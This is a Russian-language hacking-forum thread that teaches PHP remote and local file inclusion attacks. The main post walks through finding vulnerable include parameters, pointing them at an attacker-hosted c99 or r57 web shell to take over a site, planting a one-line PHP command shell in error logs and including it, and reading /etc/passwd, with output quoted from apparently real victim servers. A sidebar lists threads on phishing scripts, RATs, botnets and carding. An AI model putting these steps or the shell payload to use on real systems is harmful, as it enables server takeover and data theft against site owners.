PHP - injection на практике

Admin

Original poster
Administrator
Сообщения
888
Реакции
705
Посетить сайт
PHP-инъекция (англ. PHP injection) — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне. Потенциально опасными функциями являются:
PHP код:
eval(),
preg_replace() (с модификатором «e»),
require_once(),
include_once(),
include(),
require(),
create_function().


PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

Пример кривого кода:
PHP код:
<?
...
$module = $_GET['module'];
include $module . '.php';
...
?>

С помощью этой ошибки мы можем подставить свой ядовитый код со своего сайта и выполнить инъекцию удаленно - это называется глобальный инклуд.

Например имеется сайт

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

foto


Подставляем произвольно буквы вместо foto


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

adminloh


и видим ошибку такого плана:
Код:
Warning: include_once(pidori) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69
Warning: include_once() [function.include]: Failed opening 'wert' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69
Это 90% уязвимый сайт.
Подставляем вместо параметра foto линк на наш сайт на хостинге (сайт не должен поддерживать php скрипты иначе будет все выполнятся на нашем сайте, а не на сайте жертвы) с заранее залитым веб-шелом...

Я использую c99shell и r57shell...
И получается линк такого плана

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


И если все верно то мы получаем веб шелл... Сайт у нас в руках))

Локальный PHP - инклуд
Позволяет злоумышленнику инклудить файлы лежащие на сервере.
Пример кривого кода:
PHP код:
?php
include("include/$file");
?>


С помощью этого бага возможно инклудить т.е читать файлы на серваке... Например на сайте можно загружать файлы с любым разрешением, и мы имеем возможность загрузить свой php код и проинклудить его получив веб шелл, или прочитать логи ошибок сервака, например в лог идут все ошибки 404... мы подставляем в линк сайта свой php код:
PHP код:
<?php system($_GET[cmd]) ?>

и он выдает нам ошибку 404... мы инклудим лог и получаем веб шелл CMD...

Пример сайта

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

foto

Заменяем

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

qwert и видим ошибку:

Код:
Warning: main(files/content/qwer) [function.main]: failed to open stream: No such file or directory in /home/u3/bmohler/html/index.php on line 38
Инклудим файл /etc/passwd -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


и видим примерно такое:
Код:
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $ # root:*:0:0::/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8:News Subsystem:/:/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin bind:*:53:53:Bind
Это мы произвели инклуд /etc/passwd...

Таким же образом можно проинклудить логи ошибок и БД...
 

shooter

Pro Member
Сообщения
199
Реакции
65
Посетить сайт
Старье конечно еще то) Это в 5.4 версии позакрывали такие дыры, но есть и другие ошибки, и никуда от этого
не деться. Можно, кстати, еще вспомнить php-инъекции через загрузку файлов.
А, ну тут упоминается загрузка, только заметил)
 
Название темы
Автор Заголовок Раздел Ответы Дата
UnderD0g Интересно PHP - Пишем свой фишинг скрипт для кражи тт аккаунтов {Уровень: EASY} Другие ЯП 2
afterescape Требуются программисты Python, PHP, C++ Продажа софта 0
H Новый Linux-модуль платформы TrickBot тайно атакует Windows-ПК Подробнее: https://www.securitylab.ru/news/510661.php Корзина 0
G Команда разработчиков - php, python, веб дизайн, программирование Ищу работу. Предлагаю свои услуги. 0
GhosTM@n Интересно php rat Вирусология 2
E Интересно Парсер картинок на php Другие ЯП 0
starowar Разработка сайтов / ботов / ваших проектов по ТЗ на php, js, mysql Продажа софта 0
B PHP Уровень 2 Профессиональная веб-разработка Полезные статьи 0
B BlackNET v1.0.0 Advanced MultiOS BotNET + Secure PHP Panel + Tutorial Spam/DDOS/Malware 0
BuriTTo Помощь в PHP\JS\HTML, API VK\ Telegram бесплатно. Ищу работу. Предлагаю свои услуги. 0
ins1der CC card-checker (PHP source) Другие ЯП 0
Живой_мертвый Курсач по PHP и WordPress Другие ЯП 3
ShadowMaXD Курсы по c++ , c# , php , python , css , html и т.д. С/C++ 4
T0pDro4eR Инструкция по установке веб-сервера Apache c PHP, MariaDB и phpMyAdmin в Windows. Полезные статьи 0
kdroshev PHP/SQL: back-end разработка и базы данных Другое 0
kdroshev [PHP] Полный курс от "Школы программирования" Другое 0
kdroshev php 2015 [Специалист] 1-3 Курс Другое 0
VipRin1 Рекурсивный слив шаблона любого сайта полностью (Без php и прочих скриптов, которые нельзя скачать) Полезные статьи 0
sp70 [PHP] Telegram Bot Другие ЯП 3
Forevonly Краткое знакомство с алгоритмами. Серверный шифровальщик на PHP. Mcrypt и SHA256. Полезные статьи 0
Major1 [PHP] Скрипт фейк МФО Другие ЯП 1
Forevonly Вставка бэкдора на PHP вебсайтах с Weevely Уязвимости и взлом 0
O Курс php Вопросы и интересы 1
ProztoDno Курс по PHP и MySQL Другие ЯП 0
mardoksp Запуск crontab через php Вопросы и интересы 0
AnalblazeR Основы PHP. Другие ЯП 1
obscure KazyBot PHP RAT Spam/DDOS/Malware 1
eceNin [PHP] Пишем свой движок 2.0 Другие ЯП 0
АнАлЬнАя ЧуПаКаБрА PHP checker чекает биткоинт Бруты/Парсеры/Чекеры 0
Admin P.A.S. (php webshell) Уязвимости и взлом 1
Admin В PHP 7 обнаружены три серьезные уязвимости Новости в сети 0
WhiteYarik [php] cfbypass new Spam/DDOS/Malware 2
/intactdev EEFM / Export Email From MySQL [PHP Script Generator] Софт от наших юзеров 1
BuriTTo Web Cronjobs - php Другие ЯП 0
Admin Dorks generator for Google SE [PHP] + source Другие ЯП 0
S SQLi-DB-SQL Injection Dork Scanner v1.0 Уязвимости и взлом 2
GhosTM@n Интересно XML Notepad 2.8.0.4 - XML External Entity Injection Полезные статьи 0
N SQLi-DB-SQL Injection Dork Scanner v1.0 Корзина 0
N SQLi-DB-SQL Injection Dork Scanner v1.0 Способы заработка 0
1 Курс по SQL injection Полезные статьи 0
klobald Инструкция по использованию jSQL Injection — многофункционального инструмента поиска и эксплуатации SQL-инъекций в Kali Linux Уязвимости и взлом 0
J SQL injection Spam/DDOS/Malware 0
ins1der W3af Web Security Scanner - Программа для поиска и эксплуатации уязвимостей sql-injection Софт для работы с текстом/Другой софт 17
Admin Android, Инжекты до 6.0, Android injection Полезные статьи 1
jamsoft Вопрос по sql injection на время 2016 года Вопросы и интересы 11
S Куплю Куплю injection сайты,с sqldumper Куплю/Обменяю 5
A Интересно Пишем свой RAT на Python > {Часть 2} Уязвимости и взлом 2
MoneyLoad Принимаю заливы на пластик любого направления Ищу работу. Предлагаю свои услуги. 1
balof Seed4.Me VPN - на неограниченный срок Полезные статьи 0
S Интересно нужен вбив на вебкам Предоставляю работу. Ищу специалиста. 1

Название темы